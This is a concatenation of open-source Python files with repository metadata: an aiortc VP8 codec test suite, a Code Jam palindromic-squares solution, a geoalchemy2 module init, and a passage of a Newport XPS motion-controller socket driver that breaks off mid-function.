] | permissive | gitter-badger/aiortc | 34099aee833a56d36f53b74336a2e7344d274cf3 | 0417b6b9c75dd4fc9f049ddeda7f09f306318574 | refs/heads/master | 2020-03-30T11:22:22.704701 | 2018-10-01T12:49:46 | 2018-10-01T13:16:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,489 | py | from unittest import TestCase
from aiortc.codecs import get_decoder, get_encoder
from aiortc.codecs.vpx import (Vp8Decoder, Vp8Encoder, VpxPayloadDescriptor,
_vpx_assert, number_of_threads)
from aiortc.mediastreams import VIDEO_TIME_BASE, VideoFrame
from aiortc.rtcrtpparameters import RTCRtpCodecParameters
from .codecs import CodecTestCase
VP8_CODEC = RTCRtpCodecParameters(name='VP8', clockRate=90000)
class VpxPayloadDescriptorTest(TestCase):
def test_no_picture_id(self):
descr, rest = VpxPayloadDescriptor.parse(b'\x10')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, None)
self.assertEqual(descr.tl0picidx, None)
self.assertEqual(descr.tid, None)
self.assertEqual(descr.keyidx, None)
self.assertEqual(bytes(descr), b'\x10')
self.assertEqual(repr(descr), 'VpxPayloadDescriptor(S=1, PID=0, pic_id=None)')
self.assertEqual(rest, b'')
def test_short_picture_id_17(self):
"""
From RFC 7741 - 4.6.3
"""
descr, rest = VpxPayloadDescriptor.parse(b'\x90\x80\x11')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, 17)
self.assertEqual(descr.tl0picidx, None)
self.assertEqual(descr.tid, None)
self.assertEqual(descr.keyidx, None)
self.assertEqual(bytes(descr), b'\x90\x80\x11')
self.assertEqual(repr(descr), 'VpxPayloadDescriptor(S=1, PID=0, pic_id=17)')
self.assertEqual(rest, b'')
def test_short_picture_id_127(self):
descr, rest = VpxPayloadDescriptor.parse(b'\x90\x80\x7f')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, 127)
self.assertEqual(descr.tl0picidx, None)
self.assertEqual(descr.tid, None)
self.assertEqual(descr.keyidx, None)
self.assertEqual(bytes(descr), b'\x90\x80\x7f')
self.assertEqual(rest, b'')
def test_long_picture_id_128(self):
descr, rest = VpxPayloadDescriptor.parse(b'\x90\x80\x80\x80')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, 128)
self.assertEqual(descr.tl0picidx, None)
self.assertEqual(descr.tid, None)
self.assertEqual(descr.keyidx, None)
self.assertEqual(bytes(descr), b'\x90\x80\x80\x80')
self.assertEqual(rest, b'')
def test_long_picture_id_4711(self):
"""
From RFC 7741 - 4.6.5
"""
descr, rest = VpxPayloadDescriptor.parse(b'\x90\x80\x92\x67')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, 4711)
self.assertEqual(descr.tl0picidx, None)
self.assertEqual(descr.tid, None)
self.assertEqual(descr.keyidx, None)
self.assertEqual(bytes(descr), b'\x90\x80\x92\x67')
self.assertEqual(rest, b'')
def test_tl0picidx(self):
descr, rest = VpxPayloadDescriptor.parse(b'\x90\xc0\x92\x67\x81')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, 4711)
self.assertEqual(descr.tl0picidx, 129)
self.assertEqual(descr.tid, None)
self.assertEqual(descr.keyidx, None)
self.assertEqual(bytes(descr), b'\x90\xc0\x92\x67\x81')
self.assertEqual(rest, b'')
def test_tid(self):
descr, rest = VpxPayloadDescriptor.parse(b'\x90\x20\xe0')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, None)
self.assertEqual(descr.tl0picidx, None)
self.assertEqual(descr.tid, (3, 1))
self.assertEqual(descr.keyidx, None)
self.assertEqual(bytes(descr), b'\x90\x20\xe0')
self.assertEqual(rest, b'')
def test_keyidx(self):
descr, rest = VpxPayloadDescriptor.parse(b'\x90\x10\x1f')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, None)
self.assertEqual(descr.tl0picidx, None)
self.assertEqual(descr.tid, None)
self.assertEqual(descr.keyidx, 31)
self.assertEqual(bytes(descr), b'\x90\x10\x1f')
self.assertEqual(rest, b'')
class Vp8Test(CodecTestCase):
def test_assert(self):
with self.assertRaises(Exception) as cm:
_vpx_assert(1)
self.assertEqual(str(cm.exception), 'libvpx error: Unspecified internal error')
def test_decoder(self):
decoder = get_decoder(VP8_CODEC)
self.assertTrue(isinstance(decoder, Vp8Decoder))
def test_encoder(self):
encoder = get_encoder(VP8_CODEC)
self.assertTrue(isinstance(encoder, Vp8Encoder))
frame = VideoFrame(width=640, height=480)
frame.pts = 0
frame.time_base = VIDEO_TIME_BASE
payloads, timestamp = encoder.encode(frame)
self.assertEqual(len(payloads), 1)
self.assertTrue(len(payloads[0]) < 1300)
self.assertEqual(timestamp, 0)
# change resolution
frame = VideoFrame(width=320, height=240)
frame.pts = 3000
frame.time_base = VIDEO_TIME_BASE
payloads, timestamp = encoder.encode(frame)
self.assertEqual(len(payloads), 1)
self.assertTrue(len(payloads[0]) < 1300)
self.assertEqual(timestamp, 3000)
def test_encoder_large(self):
encoder = get_encoder(VP8_CODEC)
self.assertTrue(isinstance(encoder, Vp8Encoder))
# first keyframe
frame = VideoFrame(width=2560, height=1920)
frame.pts = 0
frame.time_base = VIDEO_TIME_BASE
payloads, timestamp = encoder.encode(frame)
self.assertEqual(len(payloads), 7)
self.assertEqual(len(payloads[0]), 1300)
self.assertEqual(timestamp, 0)
# delta frame
frame = VideoFrame(width=2560, height=1920)
frame.pts = 3000
frame.time_base = VIDEO_TIME_BASE
payloads, timestamp = encoder.encode(frame)
self.assertEqual(len(payloads), 1)
self.assertTrue(len(payloads[0]) < 1300)
self.assertEqual(timestamp, 3000)
# force keyframe
frame = VideoFrame(width=2560, height=1920)
frame.pts = 6000
frame.time_base = VIDEO_TIME_BASE
payloads, timestamp = encoder.encode(frame, force_keyframe=True)
self.assertEqual(len(payloads), 7)
self.assertEqual(len(payloads[0]), 1300)
self.assertEqual(timestamp, 6000)
def test_number_of_threads(self):
self.assertEqual(number_of_threads(1920 * 1080, 16), 8)
self.assertEqual(number_of_threads(1920 * 1080, 8), 3)
self.assertEqual(number_of_threads(1920 * 1080, 4), 2)
self.assertEqual(number_of_threads(1920 * 1080, 2), 1)
def test_roundtrip_1280_720(self):
self.roundtrip_video(VP8_CODEC, 1280, 720)
def test_roundtrip_960_540(self):
self.roundtrip_video(VP8_CODEC, 960, 540)
def test_roundtrip_640_480(self):
self.roundtrip_video(VP8_CODEC, 640, 480)
def test_roundtrip_320_240(self):
self.roundtrip_video(VP8_CODEC, 320, 240)
| [
"jeremy.laine@m4x.org"
] | jeremy.laine@m4x.org |
b2e1e547eb7cb40072a470450961ec3ea2a10584 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_118/652.py | 4beb500f3c8a4122fb591a82efec72a0653e53da | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,386 | py |
n = int(raw_input())
for c in range(n):
(A,B) = (int(r) for r in raw_input().split(' '))
L = len(str(B))
ans = []
out = 0
# The odd ones out
for v in (1,4,9):
if A <= v <= B:
ans.append(v)
out += 1
# Twos
for d in range(L/2+2):
s = '2'+'0'*d+'2'
sq = int(s)**2
#print s,sq
if A <= sq <= B: out += 1
if A <= sq <= B: ans.append(sq)
for d in range(L/4+2):
s = '2'+'0'*d+'1'+'0'*d+'2'
sq = int(s)**2
if A <= sq <= B: out += 1
if A <= sq <= B: ans.append(sq)
# Binary
p = [0,0,0,0,0]
beg = set()
for p[0] in range(L/4+2):
for p[1] in range(min(p[0],L/4+1),L/4+2):
for p[2] in range(min(p[1],L/4+1),L/4+2):
for p[3] in range(min(p[2],L/4+1),L/4+2):
for p[4] in range(min(p[3],L/4+1),L/4+2):
s = ['0'] * (L/4+1)
for pos in range(5):
if p[pos] < (L/4+1): s[p[pos]] = '1'
a = ''.join(s)
a = a[(a+'1').find('1'):]
beg.add(a)
for b in beg:
if b:
if sum([int(u) for u in b]) >= 5: continue
rev = [b+b[::-1],b+'0'+b[::-1],b+'1'+b[::-1],b+'2'+b[::-1]]
for v in rev:
v2 = int(v)**2
s = str(v2)
if A <= v2 <= B and s == s[::-1]: out += 1
if A <= v2 <= B and s == s[::-1]: ans.append(v2)
print "Case #%d: %d" % (c+1,out)
#y = len(list(set(range(A,B+1)).intersection(set([1,4,9,121,484]))))
#print A,B, ans
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
01cbd38775e6711e0d9de13848d0d67948a4adbf | 35f494e951ec449e8dc4a796f82f637e35ea18db | /geoalchemy2/admin/dialects/__init__.py | 6d1e5f6c2739d84fc783d1fcb668ac0540b1e54e | [
"MIT"
] | permissive | geoalchemy/geoalchemy2 | e083d0ab6d181a3e65a9a46882c04ddf799aee86 | 80e738d09c6929305376f245bbd38fe7ff22b3f8 | refs/heads/master | 2023-09-01T04:12:29.463815 | 2023-07-25T13:59:39 | 2023-07-25T13:59:39 | 5,638,538 | 492 | 104 | MIT | 2023-09-12T07:49:46 | 2012-09-01T10:00:24 | Python | UTF-8 | Python | false | false | 366 | py | """This module defines some dialect-specific functions used for administration tasks."""
from geoalchemy2.admin.dialects import common # noqa
from geoalchemy2.admin.dialects import geopackage # noqa
from geoalchemy2.admin.dialects import mysql # noqa
from geoalchemy2.admin.dialects import postgresql # noqa
from geoalchemy2.admin.dialects import sqlite # noqa
| [
"noreply@github.com"
] | geoalchemy.noreply@github.com |
a0ab6ad9437802c9e710e2446a34b6e0e6f0927f | 298e100a601f3edcc4b9c8dd465d934554b87065 | /config/XPS/xps_config_oct2010/XPS_C8_drivers.py | 694dd48501e6ca5bf579217deeb004b6ff834df9 | [] | no_license | newville/xrmcollect | 27bc673d1a1e0cd6ab928e27fd4964e7ca5eddd4 | f479e8812a244d478b456dab942506892180f17d | refs/heads/master | 2023-08-24T17:57:38.090068 | 2016-05-11T21:32:15 | 2016-05-11T21:32:15 | 1,025,945 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 109,311 | py | # XPS Python class
#
# for XPS-C8 Firmware V2.6.x
#
# See Programmer's manual for more information on XPS function calls
import socket
class XPS:
# Defines
MAX_NB_SOCKETS = 100
# Global variables
__sockets = {}
__usedSockets = {}
__nbSockets = 0
# Initialization Function
def __init__ (self):
XPS.__nbSockets = 0
for socketId in range(self.MAX_NB_SOCKETS):
XPS.__usedSockets[socketId] = 0
# Send command and get return
def __sendAndReceive (self, socketId, command):
try:
XPS.__sockets[socketId].send(command)
ret = XPS.__sockets[socketId].recv(1024)
while (ret.find(',EndOfAPI') == -1):
ret += XPS.__sockets[socketId].recv(1024)
except socket.timeout:
return [-2, '']
except socket.error (errNb, errString):
print 'Socket error : ' + errString
return [-2, '']
for i in range(len(ret)):
if (ret[i] == ','):
return [int(ret[0:i]), ret[i+1:-9]]
# TCP_ConnectToServer
def TCP_ConnectToServer (self, IP, port, timeOut):
socketId = 0
if (XPS.__nbSockets < self.MAX_NB_SOCKETS):
while (XPS.__usedSockets[socketId] == 1 and socketId < self.MAX_NB_SOCKETS):
socketId += 1
if (socketId == self.MAX_NB_SOCKETS):
return -1
else:
return -1
XPS.__usedSockets[socketId] = 1
XPS.__nbSockets += 1
try:
XPS.__sockets[socketId] = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
XPS.__sockets[socketId].connect((IP, port))
XPS.__sockets[socketId].settimeout(timeOut)
XPS.__sockets[socketId].setblocking(1)
except socket.error:
return -1
return socketId
# TCP_SetTimeout
def TCP_SetTimeout (self, socketId, timeOut):
if (XPS.__usedSockets[socketId] == 1):
XPS.__sockets[socketId].settimeout(timeOut)
# TCP_CloseSocket
def TCP_CloseSocket (self, socketId):
if (socketId >= 0 and socketId < self.MAX_NB_SOCKETS):
try:
XPS.__sockets[socketId].close()
XPS.__usedSockets[socketId] = 0
XPS.__nbSockets -= 1
except socket.error:
pass
# GetLibraryVersion
def GetLibraryVersion (self):
return ['XPS-C8 Firmware V2.6.x Beta 19']
# ControllerMotionKernelTimeLoadGet : Get controller motion kernel time load
def ControllerMotionKernelTimeLoadGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ControllerMotionKernelTimeLoadGet(double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# ControllerStatusGet : Read controller current status
def ControllerStatusGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ControllerStatusGet(int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# ControllerStatusStringGet : Return the controller status string corresponding to the controller status code
def ControllerStatusStringGet (self, socketId, ControllerStatusCode):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ControllerStatusStringGet(' + str(ControllerStatusCode) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# ElapsedTimeGet : Return elapsed time from controller power on
def ElapsedTimeGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ElapsedTimeGet(double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# ErrorStringGet : Return the error string corresponding to the error code
def ErrorStringGet (self, socketId, ErrorCode):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ErrorStringGet(' + str(ErrorCode) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# FirmwareVersionGet : Return firmware version
def FirmwareVersionGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'FirmwareVersionGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# TCLScriptExecute : Execute a TCL script from a TCL file
def TCLScriptExecute (self, socketId, TCLFileName, TaskName, ParametersList):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'TCLScriptExecute(' + TCLFileName + ',' + TaskName + ',' + ParametersList + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# TCLScriptExecuteAndWait : Execute a TCL script from a TCL file and wait the end of execution to return
def TCLScriptExecuteAndWait (self, socketId, TCLFileName, TaskName, InputParametersList):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'TCLScriptExecuteAndWait(' + TCLFileName + ',' + TaskName + ',' + InputParametersList + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# TCLScriptExecuteWithPriority : Execute a TCL script with defined priority
def TCLScriptExecuteWithPriority (self, socketId, TCLFileName, TaskName, TaskPriorityLevel, ParametersList):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'TCLScriptExecuteWithPriority(' + TCLFileName + ',' + TaskName + ',' + TaskPriorityLevel + ',' + ParametersList + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# TCLScriptKill : Kill TCL Task
def TCLScriptKill (self, socketId, TaskName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'TCLScriptKill(' + TaskName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# TimerGet : Get a timer
def TimerGet (self, socketId, TimerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'TimerGet(' + TimerName + ',int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# TimerSet : Set a timer
def TimerSet (self, socketId, TimerName, FrequencyTicks):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'TimerSet(' + TimerName + ',' + str(FrequencyTicks) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# Reboot : Reboot the controller
def Reboot (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'Reboot()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# Login : Log in
def Login (self, socketId, Name, Password):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'Login(' + Name + ',' + Password + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# CloseAllOtherSockets : Close all socket beside the one used to send this command
def CloseAllOtherSockets (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'CloseAllOtherSockets()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# HardwareDateAndTimeGet : Return hardware date and time
def HardwareDateAndTimeGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'HardwareDateAndTimeGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# HardwareDateAndTimeSet : Set hardware date and time
def HardwareDateAndTimeSet (self, socketId, DateAndTime):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'HardwareDateAndTimeSet(' + DateAndTime + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventAdd : ** OBSOLETE ** Add an event
def EventAdd (self, socketId, PositionerName, EventName, EventParameter, ActionName, ActionParameter1, ActionParameter2, ActionParameter3):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventAdd(' + PositionerName + ',' + EventName + ',' + EventParameter + ',' + ActionName + ',' + ActionParameter1 + ',' + ActionParameter2 + ',' + ActionParameter3 + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventGet : ** OBSOLETE ** Read events and actions list
def EventGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventGet(' + PositionerName + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventRemove : ** OBSOLETE ** Delete an event
def EventRemove (self, socketId, PositionerName, EventName, EventParameter):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventRemove(' + PositionerName + ',' + EventName + ',' + EventParameter + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventWait : ** OBSOLETE ** Wait an event
def EventWait (self, socketId, PositionerName, EventName, EventParameter):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventWait(' + PositionerName + ',' + EventName + ',' + EventParameter + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventExtendedConfigurationTriggerSet : Configure one or several events
def EventExtendedConfigurationTriggerSet (self, socketId, ExtendedEventName, EventParameter1, EventParameter2, EventParameter3, EventParameter4):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedConfigurationTriggerSet('
for i in range(len(ExtendedEventName)):
if (i > 0):
command += ','
command += ExtendedEventName[i] + ',' + EventParameter1[i] + ',' + EventParameter2[i] + ',' + EventParameter3[i] + ',' + EventParameter4[i]
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventExtendedConfigurationTriggerGet : Read the event configuration
def EventExtendedConfigurationTriggerGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedConfigurationTriggerGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventExtendedConfigurationActionSet : Configure one or several actions
def EventExtendedConfigurationActionSet (self, socketId, ExtendedActionName, ActionParameter1, ActionParameter2, ActionParameter3, ActionParameter4):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedConfigurationActionSet('
for i in range(len(ExtendedActionName)):
if (i > 0):
command += ','
command += ExtendedActionName[i] + ',' + ActionParameter1[i] + ',' + ActionParameter2[i] + ',' + ActionParameter3[i] + ',' + ActionParameter4[i]
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventExtendedConfigurationActionGet : Read the action configuration
def EventExtendedConfigurationActionGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedConfigurationActionGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventExtendedStart : Launch the last event and action configuration and return an ID
def EventExtendedStart (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedStart(int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# EventExtendedAllGet : Read all event and action configurations
def EventExtendedAllGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedAllGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventExtendedGet : Read the event and action configuration defined by ID
def EventExtendedGet (self, socketId, ID):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedGet(' + str(ID) + ',char *,char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventExtendedRemove : Remove the event and action configuration defined by ID
def EventExtendedRemove (self, socketId, ID):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedRemove(' + str(ID) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventExtendedWait : Wait events from the last event configuration
def EventExtendedWait (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedWait()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringConfigurationGet : Read different mnemonique type
def GatheringConfigurationGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringConfigurationGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringConfigurationSet : Configuration acquisition
def GatheringConfigurationSet (self, socketId, Type):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringConfigurationSet('
for i in range(len(Type)):
if (i > 0):
command += ','
command += Type[i]
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringCurrentNumberGet : Maximum number of samples and current number during acquisition
def GatheringCurrentNumberGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringCurrentNumberGet(int *,int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GatheringStopAndSave : Stop acquisition and save data
def GatheringStopAndSave (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringStopAndSave()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringDataAcquire : Acquire a configured data
def GatheringDataAcquire (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringDataAcquire()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringDataGet : Get a data line from gathering buffer
def GatheringDataGet (self, socketId, IndexPoint):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringDataGet(' + str(IndexPoint) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringDataMultipleLinesGet : Get multiple data lines from gathering buffer
def GatheringDataMultipleLinesGet (self, socketId, IndexPoint, NumberOfLines):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringDataMultipleLinesGet(' + str(IndexPoint) + ',' + str(NumberOfLines) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringReset : Empty the gathered data in memory to start new gathering from scratch
def GatheringReset (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringReset()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringRun : Start a new gathering
def GatheringRun (self, socketId, DataNumber, Divisor):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringRun(' + str(DataNumber) + ',' + str(Divisor) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringRunAppend : Re-start the stopped gathering to add new data
def GatheringRunAppend (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringRunAppend()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringStop : Stop the data gathering (without saving to file)
def GatheringStop (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringStop()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringExternalConfigurationSet : Configuration acquisition
def GatheringExternalConfigurationSet (self, socketId, Type):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringExternalConfigurationSet('
for i in range(len(Type)):
if (i > 0):
command += ','
command += Type[i]
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringExternalConfigurationGet : Read different mnemonique type
def GatheringExternalConfigurationGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringExternalConfigurationGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringExternalCurrentNumberGet : Maximum number of samples and current number during acquisition
def GatheringExternalCurrentNumberGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringExternalCurrentNumberGet(int *,int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GatheringExternalDataGet : Get a data line from external gathering buffer
def GatheringExternalDataGet (self, socketId, IndexPoint):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringExternalDataGet(' + str(IndexPoint) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringExternalStopAndSave : Stop acquisition and save data
def GatheringExternalStopAndSave (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringExternalStopAndSave()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GlobalArrayGet : Get global array value
def GlobalArrayGet (self, socketId, Number):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GlobalArrayGet(' + str(Number) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GlobalArraySet : Set global array value
def GlobalArraySet (self, socketId, Number, ValueString):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GlobalArraySet(' + str(Number) + ',' + ValueString + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# DoubleGlobalArrayGet : Get double global array value
def DoubleGlobalArrayGet (self, socketId, Number):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'DoubleGlobalArrayGet(' + str(Number) + ',double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# DoubleGlobalArraySet : Set double global array value
def DoubleGlobalArraySet (self, socketId, Number, DoubleValue):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'DoubleGlobalArraySet(' + str(Number) + ',' + str(DoubleValue) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GPIOAnalogGet : Read analog input or analog output for one or few input
def GPIOAnalogGet (self, socketId, GPIOName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GPIOAnalogGet('
for i in range(len(GPIOName)):
if (i > 0):
command += ','
command += GPIOName[i] + ',' + 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(len(GPIOName)):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GPIOAnalogSet : Set analog output for one or few output
def GPIOAnalogSet (self, socketId, GPIOName, AnalogOutputValue):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GPIOAnalogSet('
for i in range(len(GPIOName)):
if (i > 0):
command += ','
command += GPIOName[i] + ',' + str(AnalogOutputValue[i])
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GPIOAnalogGainGet : Read analog input gain (1, 2, 4 or 8) for one or few input
def GPIOAnalogGainGet (self, socketId, GPIOName):
if (XPS.__usedSockets[socketId] == 0):
return
